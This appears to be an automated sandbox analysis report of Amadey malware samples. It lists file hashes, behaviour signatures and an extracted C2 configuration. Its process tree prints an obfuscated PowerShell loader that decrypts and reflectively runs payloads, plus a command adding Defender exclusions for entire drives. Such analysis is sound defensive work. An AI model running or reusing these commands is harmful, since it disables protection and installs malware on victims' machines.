Overview
overview
10Static
static
102LRS3ODTLG...JL.exe
windows10-1703-x64
102LRS3ODTLG...JL.exe
windows11-21h2-x64
106G2SZLVHVH...3B.exe
windows10-1703-x64
106G2SZLVHVH...3B.exe
windows11-21h2-x64
106TS3GUANXW9E1KF8.exe
windows10-1703-x64
106TS3GUANXW9E1KF8.exe
windows11-21h2-x64
10G9NB5XSAH0XAAPCN.exe
windows10-1703-x64
6G9NB5XSAH0XAAPCN.exe
windows11-21h2-x64
6PV0HLG9QQ3...NU.exe
windows10-1703-x64
10PV0HLG9QQ3...NU.exe
windows11-21h2-x64
10Protect544cd51a.dll
windows10-1703-x64
1Protect544cd51a.dll
windows11-21h2-x64
1PsExec.exe
windows10-1703-x64
1PsExec.exe
windows11-21h2-x64
1W7W5WFGX1D...7O.exe
windows10-1703-x64
3W7W5WFGX1D...7O.exe
windows11-21h2-x64
6skz3rpen.kc1.exe
windows10-1703-x64
1skz3rpen.kc1.exe
windows11-21h2-x64
1Analysis
-
max time kernel
201s -
max time network
213s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
26-01-2024 19:03
Behavioral task
behavioral1
Sample
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
Resource
win11-20231222-en
Behavioral task
behavioral3
Sample
6G2SZLVHVHUJV21JB2FOVQKM701Z63B.exe
Resource
win10-20231215-en
Behavioral task
behavioral4
Sample
6G2SZLVHVHUJV21JB2FOVQKM701Z63B.exe
Resource
win11-20231215-en
Behavioral task
behavioral5
Sample
6TS3GUANXW9E1KF8.exe
Resource
win10-20231220-en
Behavioral task
behavioral6
Sample
6TS3GUANXW9E1KF8.exe
Resource
win11-20231215-en
Behavioral task
behavioral7
Sample
G9NB5XSAH0XAAPCN.exe
Resource
win10-20231215-en
Behavioral task
behavioral8
Sample
G9NB5XSAH0XAAPCN.exe
Resource
win11-20231222-en
Behavioral task
behavioral9
Sample
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Resource
win10-20231220-en
Behavioral task
behavioral10
Sample
PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Resource
win11-20231215-en
Behavioral task
behavioral11
Sample
Protect544cd51a.dll
Resource
win10-20231215-en
Behavioral task
behavioral12
Sample
Protect544cd51a.dll
Resource
win11-20231215-en
Behavioral task
behavioral13
Sample
PsExec.exe
Resource
win10-20231215-en
Behavioral task
behavioral14
Sample
PsExec.exe
Resource
win11-20231215-en
Behavioral task
behavioral15
Sample
W7W5WFGX1D82S3EIURREUP57O.exe
Resource
win10-20231215-en
Behavioral task
behavioral16
Sample
W7W5WFGX1D82S3EIURREUP57O.exe
Resource
win11-20231222-en
Behavioral task
behavioral17
Sample
skz3rpen.kc1.exe
Resource
win10-20231215-en
Behavioral task
behavioral18
Sample
skz3rpen.kc1.exe
Resource
win11-20231215-en
General
-
Target
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
-
Size
4.5MB
-
MD5
37bb6dd5e4a0d91aef18c328fee94f89
-
SHA1
72c55abc1527c898153631f1e1233c48440d4ddd
-
SHA256
9571aa429ecf266de879d8a0e207e4240263e6031adc65293fce003fc8316b57
-
SHA512
693a47726692bf6853cc1da84bdb9a72c9fba9167c58ad79cf02df67be4993b9575287de5fe0221349e2be39c83d7d1cec00e4bb445a26ddf1726f9da3feb7da
-
SSDEEP
98304:ZfPdaLQlaZm8vWMTEGky215OS870Bh8/eSKl:ZfP8caA8vWYEGkKS870Bh8/eP
Malware Config
Extracted
amadey
4.15
http://185.172.128.63
-
install_dir
6187fcb526
-
install_file
Dctooux.exe
-
strings_key
cd3b2619c9009c441355ae581d53163e
-
url_paths
/v8sjh3hs8/index.php
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
sc.exesz1kof4m.5gq.exepid Process 924 sc.exe 4176 sz1kof4m.5gq.exe -
Loads dropped DLL 1 IoCs
Processes:
sc.exepid Process 1344 sc.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
RegSvcs.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-721438792-2341338383-2410509276-1000\Software\Microsoft\Windows\CurrentVersion\Run\sc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1001078001\\sc.exe" RegSvcs.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exesc.exedescription pid Process procid_target PID 3264 set thread context of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 924 set thread context of 2800 924 sc.exe 84 -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid Process 924 sc.exe 1344 sc.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 4928 3264 WerFault.exe 72 -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exesc.exepowershell.exepowershell.execmd.exepid Process 652 powershell.exe 652 powershell.exe 652 powershell.exe 924 sc.exe 924 sc.exe 1128 powershell.exe 1128 powershell.exe 1128 powershell.exe 2140 powershell.exe 2140 powershell.exe 2140 powershell.exe 2800 cmd.exe 2800 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
sc.execmd.exepid Process 924 sc.exe 2800 cmd.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 652 powershell.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exeRegSvcs.execmd.execmd.exepowershell.exesc.execmd.exedescription pid Process procid_target PID 3264 wrote to memory of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 3264 wrote to memory of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 3264 wrote to memory of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 3264 wrote to memory of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 3264 wrote to memory of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 3264 wrote to memory of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 3264 wrote to memory of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 3264 wrote to memory of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 3264 wrote to memory of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 3264 wrote to memory of 3560 3264 2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe 73 PID 3560 wrote to memory of 4912 3560 RegSvcs.exe 76 PID 3560 wrote to memory of 4912 3560 RegSvcs.exe 76 PID 3560 wrote to memory of 4912 3560 RegSvcs.exe 76 PID 4912 wrote to memory of 1332 4912 cmd.exe 78 PID 4912 wrote to memory of 1332 4912 cmd.exe 78 PID 4912 wrote to memory of 1332 4912 cmd.exe 78 PID 1332 wrote to memory of 4712 1332 cmd.exe 80 PID 1332 wrote to memory of 4712 1332 cmd.exe 80 PID 1332 wrote to memory of 4712 1332 cmd.exe 80 PID 1332 wrote to memory of 652 1332 cmd.exe 81 PID 1332 wrote to memory of 652 1332 cmd.exe 81 PID 1332 wrote to memory of 652 1332 cmd.exe 81 PID 3560 wrote to memory of 924 3560 RegSvcs.exe 82 PID 3560 wrote to memory of 924 3560 RegSvcs.exe 82 PID 652 wrote to memory of 1128 652 powershell.exe 83 PID 652 wrote to memory of 1128 652 powershell.exe 83 PID 652 wrote to memory of 1128 652 powershell.exe 83 PID 924 wrote to memory of 2800 924 sc.exe 84 PID 924 wrote to memory of 2800 924 sc.exe 84 PID 924 wrote to memory of 2800 924 sc.exe 84 PID 652 wrote to memory of 2140 652 powershell.exe 87 PID 652 wrote to memory of 2140 652 powershell.exe 87 PID 652 wrote to memory of 2140 652 powershell.exe 87 PID 924 wrote to memory of 2800 924 sc.exe 84 PID 652 wrote to memory of 4176 652 powershell.exe 88 PID 652 wrote to memory of 4176 652 powershell.exe 88 PID 652 wrote to memory of 4176 652 powershell.exe 88 PID 2800 wrote to memory of 1344 2800 cmd.exe 89 PID 2800 wrote to memory of 1344 2800 cmd.exe 89 PID 2800 wrote to memory of 1344 2800 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe"C:\Users\Admin\AppData\Local\Temp\2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd" "3⤵
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd"4⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd';$RfUL='SplstIeistIetstIe'.Replace('stIe', ''),'TrfmgKafmgKnfmgKsfmgKfofmgKrfmgKmFfmgKinafmgKlBfmgKlofmgKckfmgK'.Replace('fmgK', ''),'DecHsSjomHsSjpHsSjrHsSjessHsSj'.Replace('HsSj', ''),'EleBZnKmBZnKeBZnKntBZnKAtBZnK'.Replace('BZnK', ''),'ReGrwradGrwrLiGrwrnGrwreGrwrsGrwr'.Replace('Grwr', ''),'CIOLbopIOLbyIOLbTIOLboIOLb'.Replace('IOLb', ''),'FrpwLNompwLNBapwLNspwLNepwLN6pwLN4SpwLNtpwLNripwLNnpwLNgpwLN'.Replace('pwLN', ''),'LZaAAoZaAAaZaAAdZaAA'.Replace('ZaAA', ''),'IswsYnswsYvokswsYeswsY'.Replace('swsY', ''),'MayHpwinyHpwMoyHpwduyHpwleyHpw'.Replace('yHpw', ''),'EnfcpnnfcptrynfcpPnfcponfcpinnfcptnfcp'.Replace('nfcp', ''),'GKVjZetCKVjZurKVjZrKVjZenKVjZtPrKVjZocKVjZessKVjZ'.Replace('KVjZ', ''),'CmmRYhanmmRYgmmRYeExmmRYtenmmRYsmmRYimmRYonmmRY'.Replace('mmRY', ''),'CrewBkzatwBkzeDwBkzecwBkzrywBkzptwBkzowBkzrwBkz'.Replace('wBkz', '');powershell -w hidden;function HYZRs($YjbML){$FKFbd=[System.Security.Cryptography.Aes]::Create();$FKFbd.Mode=[System.Security.Cryptography.CipherMode]::CBC;$FKFbd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$FKFbd.Key=[System.Convert]::($RfUL[6])('2M0fT7QfMAGeiJeE2Y8HU5skhkMH0OcAFA0SFzRHVws=');$FKFbd.IV=[System.Convert]::($RfUL[6])('Wv0CCTjoJ02lflet8TKTGg==');$qvWHS=$FKFbd.($RfUL[13])();$UQnTy=$qvWHS.($RfUL[1])($YjbML,0,$YjbML.Length);$qvWHS.Dispose();$FKFbd.Dispose();$UQnTy;}function tsjtk($YjbML){$KLabx=New-Object System.IO.MemoryStream(,$YjbML);$CeqVN=New-Object System.IO.MemoryStream;$OFOrH=New-Object System.IO.Compression.GZipStream($KLabx,[IO.Compression.CompressionMode]::($RfUL[2]));$OFOrH.($RfUL[5])($CeqVN);$OFOrH.Dispose();$KLabx.Dispose();$CeqVN.Dispose();$CeqVN.ToArray();}$xZSiw=[System.IO.File]::($RfUL[4])([Console]::Title);$VwJSg=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 5).Substring(2))));$NGyKN=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 6).Substring(2))));[System.Reflection.Assembly]::($RfUL[7])([byte[]]$NGyKN).($RfUL[10]).($RfUL[8])($null,$null);[System.Reflection.Assembly]::($RfUL[7])([byte[]]$VwJSg).($RfUL[10]).($RfUL[8])($null,$null); "5⤵PID:4712
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\sz1kof4m.5gq.exe"C:\Users\Admin\AppData\Local\Temp\sz1kof4m.5gq.exe"6⤵
- Executes dropped EXE
PID:4176
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe"C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Launches sc.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exeC:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe5⤵
- Loads dropped DLL
- Launches sc.exe
PID:1344
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 11082⤵
- Program crash
PID:4928
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e8d18d7e22c42d18a1f6936abc4f1e60
SHA193c687f2262749d2d034ff2eca8bc5e16572e399
SHA25684f0c3dcb3e1e9e89709ccd9e2cea0650d853d5d614261efe86b936ce32ef89d
SHA512defd96160752db39593eefe1931555e77406ae7bb8d5d87d0355f59b9772763cc94534cbea9e9e2cb58a6632232980e0202651cc5d1e22d1276bc830734d4cc8
-
Filesize
18KB
MD55349439b5cf62d0014a2aa64b2b7dd03
SHA10fa6b509480f34af04bffc2ebb448f339d25a801
SHA256886764c880fe790bdf534393cf67280cc7fb6b06dd01e43a2b33ca2789f353a3
SHA5123649f711406a26e6d45b92f3a8462401ac4398876d24eb004523340446d98f6e2dc1184aa64fa73967582dc9609629ec027acb6433bdb5ca38f949e44ed5ea80
-
Filesize
229KB
MD54c2a5540e7e7adb88c94df8e1967c468
SHA1979725fcb62a3492d7dbd3bfdc75e51087dc677b
SHA2569e9a0c51690263b2ff0f61f96a684725df65eb0ef8cf6fdcf400814f7634dfd1
SHA5127a964e6b10260854b18f4aa3af09e52d4a992bb4f7066f7e51b268696e8be5d405cce1e9dd392e70c2f321072a263dd9511d1c71cdf660449d786ec9c4bd3861
-
Filesize
72KB
MD54e7c21e82a81ebb852fbd1d5dce0b95b
SHA1b163eb8a73bea927cb2fff375214dce36db410df
SHA256140da189371f0c1d695737963787bc4ef64dd1addffdeacd3e53c46c4e515070
SHA51232c1add1b646398955d93a1dc6c0a2f20df921f2ea00672007c074f0556f3030dd524aa497187dd9c996466ac52963deb27753cdc40b0442d97087ff183a836d
-
Filesize
1.4MB
MD59e1d9449d92d69c51a605225410f46f9
SHA1f6e4d110f48bb4264097dd3101ef791f2c3d01b0
SHA256c5e71ca1dcfe7975449a25d339036f3720b0b72aa52d8794b024442216487a4d
SHA512000904eeacc9cc086a9f666dc8cca356e4d1a0ec0fc79dd9032c1b37399a8d75585d4a9b874ca161a38675afe69fceb817482afba75f0e09fc11169fdf16227c
-
Filesize
851KB
MD5ffede82d4a814bfef83fc66390efa5d5
SHA117629f344c63e8eb6fd52f68c2298f60d7b85bfd
SHA256f61f8f423d7c5b41eec88dad28dae97f3b13d05b86e799ecedbd9679c783a0f0
SHA512752910235f9747282124bf75233971d5e5d7e6e7758e56688352dcbd1fbccd3118dd39a85aa6fcd1733a8510d7bff6dc935d3b736c28b8f4447a4bf38cd35688
-
Filesize
992KB
MD57f9f22a49e6a6a5d76a9afbe00218f20
SHA1e6c9b9240315a006043a913025d93eab2d2376b6
SHA2564afe2196ae4ca84126633e54ce595b56c71533d175580e8267f71c05f5bb5136
SHA512aca202fc101b935a4092033d1fcd1b5b2edb0631ceb49d44094a59dbd4a7adc360d28459b92e5c1dd1d52e95b3b46db5c5b15cbadcfa4a180622ac236fac5009
-
Filesize
847KB
MD576d7ccdbe9441835833d88a5d75b4ccf
SHA1e66782fa63e4c09f6a7842271e2a3e4d4a8b919e
SHA25622f9a5fc8af92964e5b5868fffa966d603abf14e762726927fe67025cf175e3e
SHA5125cf3dcef34bdaf99be2e9f9173600fc758383cd662f1ce30985a6acc22a6bfff0c7a2601547bec432bf2b231831270fbea6832df10b3b3f2910e9793817c5915
-
Filesize
1004KB
MD52aceec38701258523827ea93b1ed77b9
SHA14af7c3bc2c8fa42ac60ed47baf188727e3611ba9
SHA256668a92877a4d3590d8e6c384a1595627df2cf9ba4ef752d201acc7b0fd920bb3
SHA51255940b65f96e8ab97b7aeb5417d647114f4818ca678c4e2164338c204731579338475dbe6a433718fa8bd2800761305505faf2cd33240e87c125628af797161a
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3KB
MD5bc665c443936ecbaccac579b2e336c09
SHA10ec27635b26a2a311568824be2bcad09e0ccd027
SHA2561b5b29a86fbab96326253ed97583e699dd7476907418f018486c1abb4ec3aec2
SHA5122fee1859a5457d7d7230762eeb23d27db40223fdf793b09e9e704df34c6e4899b60d592c7026219582cd51c431a424eb040937c0ea033d27d9ecec8a630d336f